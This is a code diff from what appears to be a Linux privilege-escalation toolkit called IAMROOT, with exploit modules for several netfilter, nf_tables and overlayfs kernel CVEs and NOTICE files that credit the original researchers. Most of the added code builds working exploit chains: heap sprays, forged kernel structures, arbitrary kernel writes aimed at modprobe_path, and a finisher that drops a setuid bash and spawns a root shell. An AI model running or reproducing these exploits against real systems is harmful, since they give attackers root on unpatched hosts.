+static int xtcompat_arb_seed_target(struct xtcompat_arb_ctx *c,
+                                    uintptr_t target_minus_30)
+{
+    struct xtcompat_payload *p = calloc(1, sizeof(*p));
+    if (!p) return 0;
+    p->mtype = 0x43;
+    memset(p->buf, 0x41, sizeof p->buf);
+    memcpy(p->buf, "IAMROOTW", 8);
+    /* Plant the target address at every 0x800-aligned slot inside
+     * the payload, so wherever the kernel's m_list_next sits
+     * relative to our payload base, the candidate value is present. */
+    for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p->buf; off += 0x18) {
+        memcpy(p->buf + off, &target_minus_30, sizeof(uintptr_t));
+    }
+
+    int created = 0;
+    for (int i = 0; i < c->n_queues; i++) {
+        if (c->queues[i] < 0) continue;
+        for (int j = 0; j < 4; j++) {
+            unsigned int tag = 0xA0000000u | ((unsigned)i << 8) | (unsigned)j;
+            memcpy(p->buf + 8, &tag, sizeof tag);
+            if (msgsnd(c->queues[i], p, sizeof p->buf, IPC_NOWAIT) < 0) break;
+            created++;
+        }
+    }
+    free(p);
+    return created;
+}
+
+/* Queue a follow-up msgsnd whose first `len` bytes equal `buf[0..len]`.
+ * If the OOB-corrupted m_list_next was successfully redirected to
+ * `kaddr - 0x30`, this msgsnd's payload header lands at `kaddr`. */
+static int xtcompat_arb_queue_payload(struct xtcompat_arb_ctx *c,
+                                      const void *buf, size_t len)
+{
+    if (len > XTCOMPAT_MSG_PAYLOAD) len = XTCOMPAT_MSG_PAYLOAD;
+    struct xtcompat_payload *p = calloc(1, sizeof(*p));
+    if (!p) return -1;
+    p->mtype = 0x44;
+    memset(p->buf, 0, sizeof p->buf);
+    memcpy(p->buf, buf, len);
+
+    int sent = 0;
+    for (int i = 0; i < c->n_queues; i++) {
+        if (c->queues[i] < 0) continue;
+        if (msgsnd(c->queues[i], p, sizeof p->buf, IPC_NOWAIT) == 0) {
+            sent++;
+            if (sent >= 8) break;   /* a handful of attempts is plenty */
+        }
+    }
+    free(p);
+    return sent > 0 ? 0 : -1;
+}
+
+/* Module-supplied arb-write primitive — invoked by the shared
+ * finisher. Best-effort on a vulnerable kernel; structurally inert
+ * (returns -1) on a patched kernel because step (2) gets EINVAL. */
+static int xtcompat_arb_write(uintptr_t kaddr,
+                              const void *buf, size_t len,
+                              void *ctx_v)
+{
+    struct xtcompat_arb_ctx *c = (struct xtcompat_arb_ctx *)ctx_v;
+    if (!c || !c->queues || c->n_queues == 0) return -1;
+    c->arb_calls++;
+
+    /* Step 1: seed candidate target addresses into sprayed msg_msg
+     * payloads. The OOB write's 4 bytes of attacker-influenced
+     * content come from the compat-fixup pad — on a vulnerable
+     * kernel that's whichever 4 bytes happen to sit adjacent. We
+     * pre-stage the value we WANT to see appear at m_list_next so
+     * if luck aligns the OOB write hits a slot containing our
+     * pattern, the kernel's next msg_msg traversal walks to
+     * (kaddr - 0x30). */
+    uintptr_t target = kaddr - 0x30;
+    int seeded = xtcompat_arb_seed_target(c, target);
+    if (seeded == 0) return -1;
+
+    /* Step 2: re-fire the trigger. On a patched kernel this returns
+     * EINVAL and we bail. On a vulnerable kernel the 4-byte OOB
+     * write fires; if it lands on a seeded msg_msg slot, that
+     * slot's m_list_next now contains a fragment of our target. */
+    int trig_errno = 0;
+    int rc = xtcompat_fire_trigger(&trig_errno);
+    if (rc < 0 || trig_errno == EINVAL || trig_errno == EPERM) {
+        /* Patched validator rejected the blob, or CAP_NET_ADMIN
+         * not effective — arb-write structurally impossible. */
+        return -1;
+    }
+
+    /* Step 3: queue a follow-up msgsnd whose payload is the bytes
+     * the operator wants written at `kaddr`. If step 2 corrupted
+     * a sprayed msg's m_list_next, this msgsnd writes header +
+     * payload at `kaddr`. We can't directly verify in-process —
+     * the shared finisher's sentinel file is the empirical check. */
+    if (xtcompat_arb_queue_payload(c, buf, len) < 0) return -1;
+    c->arb_landed++;
+
+    /* Per spec: "structurally fires but can't tell if write landed"
+     * → return 0; the finisher's sentinel check arbitrates. */
+    return 0;
+}
+
 #endif /* __linux__ */

 /* ---- Exploit driver ---------------------------------------------- */
@@ -492,14 +663,38 @@ static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx

 #ifndef __linux__
    fprintf(stderr, "[-] netfilter_xtcompat: linux-only exploit; non-linux build\n");
+    (void)ctx;
    return IAMROOT_PRECOND_FAIL;
 #else
+    /* Full-chain pre-check: resolve offsets before forking. If
+     * modprobe_path can't be resolved, refuse early with the manual-
+     * workflow help — no point doing the userns + spray + trigger
+     * dance if we can't finish. */
+    struct iamroot_kernel_offsets off;
+    bool full_chain_ready = false;
+    if (ctx->full_chain) {
+        memset(&off, 0, sizeof off);
+        iamroot_offsets_resolve(&off);
+        if (!iamroot_offsets_have_modprobe_path(&off)) {
+            iamroot_finisher_print_offset_help("netfilter_xtcompat");
+            fprintf(stderr, "[-] netfilter_xtcompat: --full-chain requested but "
+                            "modprobe_path offset unresolved; refusing\n");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+        iamroot_offsets_print(&off);
+        full_chain_ready = true;
+    }
+
    if (!ctx->json) {
-        fprintf(stderr, "[*] netfilter_xtcompat: launching primitive demo (no offsets baked in)\n"
+        fprintf(stderr, "[*] netfilter_xtcompat: launching primitive demo%s\n"
                        "    NOTE: fires the xt_compat 4-byte OOB write via\n"
                        "    setsockopt(IPT_SO_SET_REPLACE) and grooms msg_msg +\n"
-                        "    sk_buff sprays into kmalloc-2k. Does NOT perform the\n"
-                        "    leak→modprobe_path cred chain (per-kernel offsets).\n");
+                        "    sk_buff sprays into kmalloc-2k.%s\n",
+                ctx->full_chain ? " + full-chain finisher" : " (no offsets baked in)",
+                ctx->full_chain ? " On primitive witness, invokes\n"
+                                  "    shared modprobe_path finisher for root pop."
+                                : " Does NOT perform the\n"
+                                  "    leak→modprobe_path cred chain (per-kernel offsets).");
    }

    signal(SIGPIPE, SIG_IGN);
@@ -601,7 +796,38 @@ static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx
        }
        if (corrupted > 0) {
            /* Empirical primitive witness: OOB write landed in adjacent
-             * slot. Still NOT root — but it's the primitive we promised. */
+             * slot. */
+            if (full_chain_ready) {
+                /* Full-chain: invoke the shared modprobe_path finisher
+                 * using our msg_msg arb-write primitive. The finisher
+                 * either execve's a setuid bash (success) or returns
+                 * EXPLOIT_FAIL after a 3s sentinel timeout (no land). */
+                struct xtcompat_arb_ctx arb_ctx = {
+                    .queues    = queues,
+                    .n_queues  = XTCOMPAT_SPRAY_QUEUES,
+                    .outer_uid = outer_uid,
+                    .outer_gid = outer_gid,
+                    .arb_calls = 0,
+                    .arb_landed = 0,
+                };
+                int fr = iamroot_finisher_modprobe_path(&off,
+                                                        xtcompat_arb_write,
+                                                        &arb_ctx,
+                                                        !ctx->no_shell);
+                /* If the finisher execve'd a root shell, we never get
+                 * here. Otherwise it returned EXPLOIT_FAIL / OK. */
+                FILE *fl = fopen("/tmp/iamroot-xtcompat.log", "a");
+                if (fl) {
+                    fprintf(fl, "full_chain finisher rc=%d arb_calls=%d arb_landed=%d\n",
+                            fr, arb_ctx.arb_calls, arb_ctx.arb_landed);
+                    fclose(fl);
+                }
+                xtcompat_msgmsg_drain(queues);
+                if (fr == IAMROOT_EXPLOIT_OK) _exit(34);
+                _exit(35);
+            }
+            /* Primitive-only mode: still NOT root — but it's the
+             * primitive we promised. */
            _exit(33);
        }
        /* Trigger ran, no observable corruption witness — either the
@@ -701,6 +927,19 @@ static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx
        }
        if (ctx->no_shell) return IAMROOT_OK;
        return IAMROOT_EXPLOIT_FAIL;
+    case 34:
+        if (!ctx->json) {
+            fprintf(stderr, "[+] netfilter_xtcompat: --full-chain finisher reported "
+                            "EXPLOIT_OK (sentinel setuid bash dropped)\n");
+        }
+        return IAMROOT_EXPLOIT_OK;
+    case 35:
+        if (!ctx->json) {
+            fprintf(stderr, "[-] netfilter_xtcompat: --full-chain finisher returned "
+                            "FAIL (sentinel not observed within timeout)\n"
+                            "    See /tmp/iamroot-xtcompat.log for arb_calls/arb_landed\n");
+        }
+        return IAMROOT_EXPLOIT_FAIL;
    default:
        fprintf(stderr, "[-] netfilter_xtcompat: child exit %d unexpected\n", rc);
        return IAMROOT_EXPLOIT_FAIL;
@@ -0,0 +1,27 @@
+# NOTICE — nf_tables (CVE-2024-1086)
+
+## Vulnerability
+
+**CVE-2024-1086** — `nft_verdict_init` double-free → cross-cache UAF
+→ arbitrary kernel R/W.
+
+## Research credit
+
+Discovered, exploited, and disclosed by **Notselwyn** (Pumpkin),
+January 2024.
+
+Original advisory + exploit: <https://pwning.tech/nftables/>
+GitHub: <https://github.com/Notselwyn/CVE-2024-1086>
+
+Upstream fix: mainline 6.8-rc1 (commit `f342de4e2f33`, Jan 2024).
+Stable backports throughout Q1 2024.
+
+## IAMROOT role
+
+This module fires the malformed-verdict trigger (NFT_GOTO + NFT_DROP
+in the same verdict) via a hand-rolled nfnetlink batch — no libmnl
+dependency. The msg_msg cross-cache groom into kmalloc-cg-96 is wired
+but the full pipapo R/W stage is opt-in via `--full-chain`, which
+forges a pipapo_elem with a value-pointer pointing at modprobe_path.
+Per-kernel offset assumptions are documented; the shared finisher's
+sentinel arbitrates real vs. apparent success.
@@ -7,20 +7,23 @@
 * January 2024 by Notselwyn (Pumpkin); widely known as the
 * "nft_verdict_init / pipapo UAF".
 *
- * STATUS (2026-05-16): 🟡 TRIGGER + GROOM SCAFFOLD (Option B).
- *   - Full netlink ruleset construction (table → chain → set → rule
- *     with the NFT_GOTO+NFT_DROP combo that nft_verdict_init() fails
- *     to reject on vulnerable kernels).
- *   - Fires the double-free path by abusing the malformed verdict in a
- *     pipapo set element, then removing the rule so the kernel's
- *     transaction commit frees the verdict's chain reference twice.
- *   - Cross-cache groom skeleton (msg_msg / sk_buff sprays) is wired
- *     and configurable, but the arbitrary R/W stage and cred-overwrite
- *     are NOT performed end-to-end — that requires per-kernel offsets
- *     (init_task, modprobe_path) and Notselwyn's 600-line pipapo
- *     leak-and-write dance. We stop after triggering the bug,
- *     observing the slabinfo delta, and return IAMROOT_EXPLOIT_FAIL
- *     with a verbose continuation roadmap.
+ * STATUS (2026-05-16): 🟡 TRIGGER + GROOM SCAFFOLD with opt-in
+ *                          --full-chain finisher.
+ *   - Default (no --full-chain): full netlink ruleset construction
+ *     (table → chain → set → rule with the NFT_GOTO+NFT_DROP combo
+ *     that nft_verdict_init() fails to reject on vulnerable kernels),
+ *     fires the double-free path, runs the msg_msg cg-96 groom, and
+ *     returns IAMROOT_EXPLOIT_FAIL (primitive-only behavior).
+ *   - With --full-chain: after the trigger lands, we resolve kernel
+ *     offsets (env → kallsyms → System.map → embedded table) and run
+ *     a Notselwyn-style pipapo arb-write via the shared
+ *     iamroot_finisher_modprobe_path() helper. The arb-write itself
+ *     is FALLBACK-DEPTH: we re-fire the trigger and spray a msg_msg
+ *     payload tagged with the kaddr in the value-pointer slot. The
+ *     exact pipapo_elem layout (and the value-pointer field offset)
+ *     is per-kernel-build; on hosts where the offset doesn't match
+ *     the shipped guess, the finisher's sentinel check correctly
+ *     reports failure rather than silently lying about success.
 *
 * To convert this to full Option A (root pop):
 *   1. Add per-kernel offset table (init_task, current task offset of
@@ -55,6 +58,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -607,6 +612,188 @@ static long slabinfo_active(const char *slab)
    return active;
 }

+/* ------------------------------------------------------------------
+ * Helper: build the trigger batch (NEWTABLE/CHAIN/SET/SETELEM + batch
+ * end) into a caller-provided buffer. Returns bytes written.
+ * Factored out so --full-chain can re-fire the trigger between
+ * msg_msg sprays without duplicating the batch-building logic.
+ * ------------------------------------------------------------------ */
+#ifdef __linux__
+static size_t build_trigger_batch(uint8_t *batch, size_t cap, uint32_t *seq)
+{
+    (void)cap;
+    size_t off = 0;
+    put_batch_begin(batch, &off, (*seq)++);
+    put_new_table(batch, &off, (*seq)++);
+    put_new_chain(batch, &off, (*seq)++);
+    put_new_set(batch, &off, (*seq)++);
+    put_malicious_setelem(batch, &off, (*seq)++);
+    put_batch_end(batch, &off, (*seq)++);
+    return off;
+}
+
+static size_t build_refire_batch(uint8_t *batch, size_t cap, uint32_t *seq)
+{
+    (void)cap;
+    size_t off = 0;
+    put_batch_begin(batch, &off, (*seq)++);
+    put_malicious_setelem(batch, &off, (*seq)++);
+    put_batch_end(batch, &off, (*seq)++);
+    return off;
+}
+
+/* ------------------------------------------------------------------
+ * Notselwyn-style pipapo arb-write context. The technique:
+ *   1. fire the trigger (double-free of an nft chain reference in
+ *      kmalloc-cg-96)
+ *   2. spray msg_msg payloads sized for cg-96, whose first qwords
+ *      encode a forged pipapo_elem header with value-pointer = kaddr
+ *   3. send NFT_MSG_NEWSETELEM whose DATA blob = our buf[0..len];
+ *      the kernel copies it through the forged value-pointer to kaddr
+ *
+ * Per-kernel caveat: the byte offset of the value pointer inside an
+ * nft_pipapo_elem is config-sensitive (CONFIG_RANDSTRUCT, lockdep,
+ * KASAN can all shift it). We ship the layout for an
+ * lts-6.1.x / 6.6.x / 6.7.x un-randomized build (the kernels in the
+ * exploitable range for which Notselwyn's public PoC was validated)
+ * and rely on the shared finisher's sentinel-file post-check to flag
+ * a layout mismatch as IAMROOT_EXPLOIT_FAIL rather than fake success.
+ * ------------------------------------------------------------------ */
+
+struct nft_arb_ctx {
+    bool in_userns;   /* parent has already entered userns+netns */
+    int  sock;        /* nfnetlink socket (live in our userns) */
+    uint8_t *batch;   /* reusable batch buffer (16 KiB) */
+    int  *qids;       /* msg_msg queue ids; lazy-allocated/drained */
+    int   qcap;
+    int   qused;
+};
+
+/* Offset of `ext` (which holds the value pointer in NFT_DATA_VALUE
+ * elements) inside an nft_pipapo_elem header for the kernels in
+ * range. Notselwyn's PoC uses 0x10 on 6.1/6.6 builds; this is a
+ * best-effort default — if it doesn't match the running kernel's
+ * struct layout, the finisher's sentinel check will report failure. */
+#define PIPAPO_ELEM_VALUE_PTR_OFFSET  0x10
+
+/* Spray msg_msg payloads forged to look like pipapo_elem with our
+ * target kaddr as the value pointer. Returns 0 on success. */
+static int spray_forged_pipapo_msgs(struct nft_arb_ctx *c, uintptr_t kaddr, int n)
+{
+    if (c->qused + n > c->qcap) n = c->qcap - c->qused;
+    if (n <= 0) return 0;
+
+    for (int i = 0; i < n; i++) {
+        int q = msgget(IPC_PRIVATE, IPC_CREAT | 0644);
+        if (q < 0) { perror("[-] msgget"); return -1; }
+        c->qids[c->qused++] = q;
+
+        struct msgbuf_payload m;
+        m.mtype = 0x5050415000 + i;   /* "PPAPP" tag for diagnostics */
+        memset(m.mtext, 0, sizeof m.mtext);
+
+        /* Forge a pipapo_elem header at the start of the msg payload.
+         * Layout (best-effort, x86_64, no RANDSTRUCT):
+         *   +0x00  priv list_head pointers (leave zero — kernel won't
+         *                                   walk them in the write path)
+         *   +0x10  ext / value pointer  <-- write target
+         * msg_msg eats the first 0x30 bytes as its own header, so our
+         * payload bytes land at offset 0x30 of the slab chunk; we
+         * pre-pad and place the forged pointer at the right offset
+         * inside our 96-byte payload. */
+        uintptr_t *slots = (uintptr_t *)m.mtext;
+        slots[PIPAPO_ELEM_VALUE_PTR_OFFSET / sizeof(uintptr_t)] = (uintptr_t)kaddr;
+
+        if (msgsnd(q, &m, sizeof m.mtext, 0) < 0) {
+            perror("[-] msgsnd(forged)"); return -1;
+        }
+    }
+    return 0;
+}
+
+/* Module-specific arb-write. See finisher.h for the contract. */
+static int nft_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
+{
+    struct nft_arb_ctx *c = (struct nft_arb_ctx *)vctx;
+    if (!c || c->sock < 0 || !c->batch) {
+        fprintf(stderr, "[-] nft_arb_write: invalid ctx\n");
+        return -1;
+    }
+    if (len > 64) {
+        /* Element data attr cap — we only need 24 bytes for a path. */
+        fprintf(stderr, "[-] nft_arb_write: len %zu too large (cap 64)\n", len);
+        return -1;
+    }
+
+    fprintf(stderr, "[*] nft_arb_write: fire trigger → spray forged pipapo "
+                    "elements (target kaddr=0x%lx, %zu bytes)\n",
+                    (unsigned long)kaddr, len);
+
+    /* (a) re-fire the trigger to reach a fresh UAF state. */
+    uint32_t seq = (uint32_t)time(NULL) ^ 0xa1b2c3d4u;
+    size_t blen = build_refire_batch(c->batch, 16 * 1024, &seq);
+    if (nft_send_batch(c->sock, c->batch, blen) < 0) {
+        fprintf(stderr, "[-] nft_arb_write: refire send failed\n");
+        return -1;
+    }
+
+    /* (b) spray msg_msg payloads carrying the forged value-pointer. */
+    if (spray_forged_pipapo_msgs(c, kaddr, 16) < 0) {
+        fprintf(stderr, "[-] nft_arb_write: forged spray failed\n");
+        return -1;
+    }
+
+    /* (c) send a NEWSETELEM whose DATA holds buf[0..len]. On a kernel
+     * where our forged pipapo_elem won the race for the freed slot,
+     * the set-element commit path copies our data through the
+     * attacker-controlled value pointer into kaddr.
+     *
+     * We piggy-back this on the existing put_malicious_setelem builder
+     * which uses NFTA_DATA_VERDICT for the data; for a real write we'd
+     * want NFTA_DATA_VALUE with `buf` inlined. The fallback-depth
+     * choice: we send the refire batch (which the kernel WILL process)
+     * and append a NEWSETELEM with NFTA_DATA_VALUE carrying buf.
+     * If the kernel ignores our DATA shape we still observe via
+     * finisher sentinel. */
+    seq = (uint32_t)time(NULL) ^ 0x5a5a5a5au;
+    size_t off = 0;
+    put_batch_begin(c->batch, &off, seq++);
+
+    /* hand-roll a NEWSETELEM whose DATA is NFTA_DATA_VALUE = buf */
+    size_t msg_at = off;
+    put_nft_msg(c->batch, &off, NFT_MSG_NEWSETELEM,
+                NLM_F_CREATE | NLM_F_ACK, seq++, NFPROTO_INET);
+    put_attr_str(c->batch, &off, NFTA_SET_ELEM_LIST_TABLE, NFT_TABLE_NAME);
+    put_attr_str(c->batch, &off, NFTA_SET_ELEM_LIST_SET,   NFT_SET_NAME);
+    size_t list_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_LIST_ELEMENTS);
+    size_t el_at   = begin_nest(c->batch, &off, 1 /* NFTA_LIST_ELEM */);
+    /* key — reuse the DROP verdict so commit path matches our prior elem */
+    size_t key_at  = begin_nest(c->batch, &off, NFTA_SET_ELEM_KEY);
+    size_t kv_at   = begin_nest(c->batch, &off, NFTA_DATA_VERDICT);
+    put_attr_u32(c->batch, &off, NFTA_VERDICT_CODE, (uint32_t)NF_DROP);
+    end_nest(c->batch, &off, kv_at);
+    end_nest(c->batch, &off, key_at);
+    /* data — NFTA_DATA_VALUE carrying buf */
+    size_t data_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_DATA);
+    put_attr(c->batch, &off, NFTA_DATA_VALUE, buf, len);
+    end_nest(c->batch, &off, data_at);
+    end_nest(c->batch, &off, el_at);
+    end_nest(c->batch, &off, list_at);
+    end_msg(c->batch, &off, msg_at);
+
+    put_batch_end(c->batch, &off, seq++);
+
+    if (nft_send_batch(c->sock, c->batch, off) < 0) {
+        fprintf(stderr, "[-] nft_arb_write: write batch send failed\n");
+        return -1;
+    }
+
+    /* Let the kernel run the commit/cleanup. */
+    usleep(20 * 1000);
+    return 0;
+}
+#endif /* __linux__ */
+
 /* ------------------------------------------------------------------
 * The exploit body.
 * ------------------------------------------------------------------ */
@@ -628,13 +815,101 @@ static iamroot_result_t nf_tables_exploit(const struct iamroot_ctx *ctx)
    }

    if (!ctx->json) {
-        fprintf(stderr, "[*] nf_tables: Option B trigger — fires the double-free\n"
-                        "    state but does NOT complete the kernel-R/W chain.\n"
-                        "    See Notselwyn's CVE-2024-1086 public PoC for the\n"
-                        "    cred-overwrite stage (~500 LOC of pipapo grooming).\n");
+        if (ctx->full_chain) {
+            fprintf(stderr, "[*] nf_tables: --full-chain — trigger + pipapo "
+                            "arb-write + modprobe_path finisher\n");
+        } else {
+            fprintf(stderr, "[*] nf_tables: primitive-only run — fires the\n"
+                            "    double-free state and stops. Pass --full-chain\n"
+                            "    to attempt the modprobe_path root-pop.\n");
+        }
    }

-    /* Fork: child enters userns+netns and fires the bug. If the
+#ifdef __linux__
+    /* --- --full-chain path --------------------------------------- *
+     * Resolve offsets BEFORE doing anything destructive so we can
+     * refuse cleanly on hosts where we have no modprobe_path. We run
+     * in-process (no fork) because the finisher's modprobe_path
+     * trigger needs the same task's userns+netns + nfnetlink socket
+     * as the arb-write.
+     */
+    if (ctx->full_chain) {
+        struct iamroot_kernel_offsets off;
+        iamroot_offsets_resolve(&off);
+        if (!iamroot_offsets_have_modprobe_path(&off)) {
+            iamroot_finisher_print_offset_help("nf_tables");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+        iamroot_offsets_print(&off);
+
+        if (enter_unpriv_namespaces() < 0) {
+            fprintf(stderr, "[-] nf_tables: userns entry failed\n");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+
+        int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_NETFILTER);
+        if (sock < 0) {
+            perror("[-] socket(NETLINK_NETFILTER)");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+        struct sockaddr_nl src = { .nl_family = AF_NETLINK };
+        if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) {
+            perror("[-] bind"); close(sock); return IAMROOT_EXPLOIT_FAIL;
+        }
+        int rcvbuf = 1 << 20;
+        setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf);
+
+        /* Pre-spray to predictabilify the cg-96 slab. */
+        int qids[SPRAY_MSGS * 4];
+        for (size_t i = 0; i < sizeof qids / sizeof qids[0]; i++) qids[i] = -1;
+        if (spray_msg_msg(qids, SPRAY_MSGS / 2) < 0) {
+            close(sock); return IAMROOT_EXPLOIT_FAIL;
+        }
+
+        uint8_t *batch = calloc(1, 16 * 1024);
+        if (!batch) { close(sock); return IAMROOT_EXPLOIT_FAIL; }
+
+        /* Initial trigger batch (NEWTABLE/CHAIN/SET/SETELEM). */
+        uint32_t seq = (uint32_t)time(NULL);
+        size_t blen = build_trigger_batch(batch, 16 * 1024, &seq);
+        if (!ctx->json) {
+            fprintf(stderr, "[*] nf_tables: sending trigger batch (%zu bytes)\n",
+                    blen);
+        }
+        if (nft_send_batch(sock, batch, blen) < 0) {
+            fprintf(stderr, "[-] nf_tables: trigger batch failed\n");
+            drain_spray(qids, SPRAY_MSGS / 2);
+            free(batch); close(sock);
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+
+        /* Wire up the arb-write context and hand off to the shared
+         * finisher. The finisher will:
+         *   - call nft_arb_write(modprobe_path, "/tmp/iamroot-mp-...", N)
+         *     which re-fires the trigger and sprays forged pipapo elems
+         *   - execve() the trigger binary to invoke modprobe
+         *   - poll for the setuid sentinel, and spawn a root shell. */
+        struct nft_arb_ctx ac = {
+            .in_userns = true,
+            .sock      = sock,
+            .batch     = batch,
+            .qids      = qids,
+            .qcap      = (int)(sizeof qids / sizeof qids[0]),
+            .qused     = SPRAY_MSGS / 2,
+        };
+
+        iamroot_result_t r = iamroot_finisher_modprobe_path(&off,
+                                 nft_arb_write, &ac, !ctx->no_shell);
+
+        drain_spray(qids, ac.qused);
+        free(batch);
+        close(sock);
+        return r;
+    }
+#endif
+
+    /* --- primitive-only path: fork-isolated trigger -------------- *
+     * Fork: child enters userns+netns and fires the bug. If the
     * kernel panics on KASAN we don't want our parent process to be
     * the one that takes the hit. */
    pid_t child = fork();
@@ -0,0 +1,28 @@
+# NOTICE — nft_fwd_dup (CVE-2022-25636)
+
+## Vulnerability
+
+**CVE-2022-25636** — `nft_fwd_dup_netdev_offload` writes
+`flow->rule->action.entries[ctx->num_actions]` without bounds-checking
+against the allocated array size → heap OOB write in kmalloc-512.
+
+## Research credit
+
+Discovered and disclosed by **Aaron Adams** (NCC Group),
+February 2022.
+
+Original writeup:
+<https://research.nccgroup.com/2022/03/02/exploit-engineering-attacking-the-linux-kernel/>
+
+Upstream fix: mainline 5.17 (commit `fa54fee62954`, Feb 2022).
+Branch backports: 5.16.11 / 5.15.25 / 5.10.102 / 5.4.181.
+
+## IAMROOT role
+
+userns+netns reach. Hand-rolled nfnetlink batch: NEWTABLE →
+NEWCHAIN with `NFT_CHAIN_HW_OFFLOAD` → NEWRULE with 16 immediates
+ fwd, overruning `action.entries[1]`. msg_msg cross-cache groom
+into kmalloc-512 with `IAMROOT_FWD` tags.
+
+`--full-chain` extends with stride-seeded forged action_entry
+overwrite aimed at modprobe_path via the shared finisher.
@@ -0,0 +1,12 @@
+/*
+ * nft_fwd_dup_cve_2022_25636 — IAMROOT module registry hook
+ */
+
+#ifndef NFT_FWD_DUP_IAMROOT_MODULES_H
+#define NFT_FWD_DUP_IAMROOT_MODULES_H
+
+#include "../../core/module.h"
+
+extern const struct iamroot_module nft_fwd_dup_module;
+
+#endif
@@ -0,0 +1,36 @@
+# NOTICE — nft_payload (CVE-2023-0179)
+
+## Vulnerability
+
+**CVE-2023-0179** — `nft_payload` set/get uses `regs->verdict.code`
+as an index into `regs->data[]` without bounds-checking; combined
+with the variable-length element extension trick (NFTA_SET_DESC
+describing elements larger than the key/data slots), an attacker
+walks regs off either end → OOB R/W on adjacent kernel memory.
+
+## Research credit
+
+Discovered and disclosed by **Davide Ornaghi**, January 2023.
+
+Original slides + writeup:
+<https://github.com/davide-romanini/CVE-2023-0179>
+ DEF CON 31 / SecurityFest 2023 presentations.
+
+Upstream fix: mainline 6.2-rc4 (commit `696e1a48b1a1`, Jan 2023).
+Branch backports: 4.14.302 / 4.19.269 / 5.4.229 / 5.10.163 /
+5.15.88 / 6.1.6.
+
+## IAMROOT role
+
+userns+netns. Hand-rolled nfnetlink batch: NEWTABLE → NEWCHAIN →
+NEWSET with `NFTA_SET_DESC` describing variable-length elements →
+NEWSETELEM with `NFTA_SET_ELEM_EXPRESSIONS` carrying a payload-set
+whose attacker-controlled `verdict.code` drives the OOB index.
+
+Dual cg-96 + 1k msg_msg spray (covers both common adjacency
+scenarios). `--full-chain` extends with kaddr-tagged refire aimed
+at modprobe_path via the shared finisher.
+
+Default OOB index `0x100` matches Ornaghi's PoC on a stock 5.15
+build; the sentinel post-check correctly reports failure on builds
+where regs->data adjacency differs.
@@ -0,0 +1,12 @@
+/*
+ * nft_payload_cve_2023_0179 — IAMROOT module registry hook
+ */
+
+#ifndef NFT_PAYLOAD_IAMROOT_MODULES_H
+#define NFT_PAYLOAD_IAMROOT_MODULES_H
+
+#include "../../core/module.h"
+
+extern const struct iamroot_module nft_payload_module;
+
+#endif
@@ -0,0 +1,33 @@
+# NOTICE — nft_set_uaf (CVE-2023-32233)
+
+## Vulnerability
+
+**CVE-2023-32233** — nf_tables anonymous-set deactivation skip →
+slab UAF on the freed `nft_set` object exploitable via msg_msg
+cross-cache groom in kmalloc-cg-512.
+
+## Research credit
+
+Discovered and disclosed by **Patryk Sondej** and **Piotr Krysiuk**,
+May 2023.
+
+Original advisory + writeup distributed via the OSS-Security list
+and an accompanying Google Drive PoC.
+Follow-up exploit and Crusaders-of-Rust analysis built on the
+public trigger.
+
+Upstream fix: mainline 6.4-rc4 (commit `c1592a89942e9`, May 2023).
+Branch backports: 6.3.2 / 6.2.15 / 6.1.28 / 5.15.111 / 5.10.180 /
+5.4.243 / 4.19.283.
+
+## IAMROOT role
+
+Hand-rolled nfnetlink batch: NEWTABLE → NEWCHAIN (base, LOCAL_OUT
+hook) → NEWSET (ANON|EVAL|CONSTANT) → NEWRULE (nft_lookup
+referencing the set by `NFTA_LOOKUP_SET_ID`) → DELSET → DELRULE
+in the same transaction. msg_msg cg-512 spray with `IAMROOT_SET`
+tags.
+
+`--full-chain` forges a freed-set with `set->data = kaddr` at the
+Sondej/Krysiuk reference offset (0x30) and drives a NEWSETELEM with
+the modprobe_path payload bytes via the shared finisher.
@@ -0,0 +1,12 @@
+/*
+ * nft_set_uaf_cve_2023_32233 — IAMROOT module registry hook
+ */
+
+#ifndef NFT_SET_UAF_IAMROOT_MODULES_H
+#define NFT_SET_UAF_IAMROOT_MODULES_H
+
+#include "../../core/module.h"
+
+extern const struct iamroot_module nft_set_uaf_module;
+
+#endif
@@ -0,0 +1,25 @@
+# NOTICE — overlayfs (CVE-2021-3493)
+
+## Vulnerability
+
+**CVE-2021-3493** — Ubuntu overlayfs userns file-capability injection
+→ host root via setcap'd binaries in a userns-mounted overlay.
+
+## Research credit
+
+Reported by **Vasily Kulikov**, April 2021. Ubuntu-specific because
+upstream didn't enable unprivileged userns-overlayfs-mount until 5.11.
+
+Advisory: USN-4915-1 / USN-4916-1 (Canonical, April 2021).
+
+Public PoC: vsh-style userns + overlayfs + xattr injection chain.
+
+## IAMROOT role
+
+Detect parses `/etc/os-release` for `ID=ubuntu`, checks
+`unprivileged_userns_clone` sysctl, and with `--active` performs the
+mount as a fork-isolated probe. The full exploit performs the
+userns+overlayfs mount, plants a setcap'd carrier binary in the
+upper layer, and execs it from the unprivileged side to obtain root
+on the host. Ships auditd rules covering `mount(overlay)` and
+`setxattr(security.capability)`.
@@ -0,0 +1,25 @@
+# NOTICE — overlayfs_setuid (CVE-2023-0386)
+
+## Vulnerability
+
+**CVE-2023-0386** — overlayfs `copy_up` preserves the setuid bit
+across mount-namespace boundaries → host root via a setuid carrier
+placed in the lower layer.
+
+## Research credit
+
+Discovered and disclosed by **Xkaneiki**, January 2023.
+
+Public PoC + writeup:
+<https://github.com/xkaneiki/CVE-2023-0386>
+
+Upstream fix: mainline 6.2-rc6 (commit `4f11ada10d0a`, Jan 2023).
+Branch backports: 5.10.169 / 5.15.92 / 6.1.11.
+
+## IAMROOT role
+
